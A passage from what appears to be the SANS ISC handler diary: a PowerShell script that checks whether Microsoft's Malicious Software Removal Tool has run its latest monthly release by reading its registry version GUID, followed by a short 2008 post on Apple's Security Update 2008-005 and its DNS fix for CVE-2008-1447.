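$MrtKey       = 'HKLM:\SOFTWARE\Microsoft\RemovalTools\MRT'
$ExpectedGuid = 'BC308029-4E38-4D89-85C0-8A04FC9AD976'   # July 2008 release, from the KB

function Get-MrtStatus {
    param([string]$Expected = $ExpectedGuid)

    # -ErrorAction SilentlyContinue returns nothing when the key or value is absent.
    $props = Get-ItemProperty -Path $MrtKey -Name Version -ErrorAction SilentlyContinue
    if ($null -eq $props) {
        # No Version value: the tool has never completed a run on this machine,
        # which is what a machine stuck on the new (admin-only) license prompt looks like.
        return [pscustomobject]@{ Status = 'NeverRun'; Version = $null }
    }

    # Strip braces defensively so a braced GUID still compares equal
    # (assumption about the stored format; the KB only calls it "a GUID").
    $recorded = ($props.Version -replace '[{}]', '').ToUpperInvariant()
    if ($recorded -eq $Expected.ToUpperInvariant()) {
        return [pscustomobject]@{ Status = 'Current'; Version = $recorded }
    }

    # A GUID is present but not this month's: the tool ran at some point but has
    # not executed the latest update, so the machine needs attention.
    return [pscustomobject]@{ Status = 'Stale'; Version = $recorded }
}

$status = Get-MrtStatus
# One tab-separated line per machine, easy to collect from a logon script into a
# central share; a non-zero exit code lets a scheduler flag the stragglers.
"{0}`t{1}`t{2}" -f $env:COMPUTERNAME, $status.Status, $status.Version
if ($status.Status -ne 'Current') { exit 1 }
```

When the next monthly release ships, only $ExpectedGuid needs to change to the new value from the KB.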

Robert
ISC Handler on Duty


Published: 2008-08-01

Apple's Security Update 2008-005: DNS workaround finally included

Apple released their patch overnight (depending on your timezone of course).

Most importantly, it contains the workaround for the DNS bug CVE-2008-1447. Also included is an upgrade to PHP 5.2.6 (which was released in source code at www.php.net on May 1st). Seems we all need to urge Jobs' gang to release patches significantly faster: it's the price to pay for basing parts of your system on open source code.

Apple Mac OS X users get it through Software Update. As always it's one big patch; given that little choice, you'll want to PATCH NOW.

--
Swa Frantzen -- Section 66
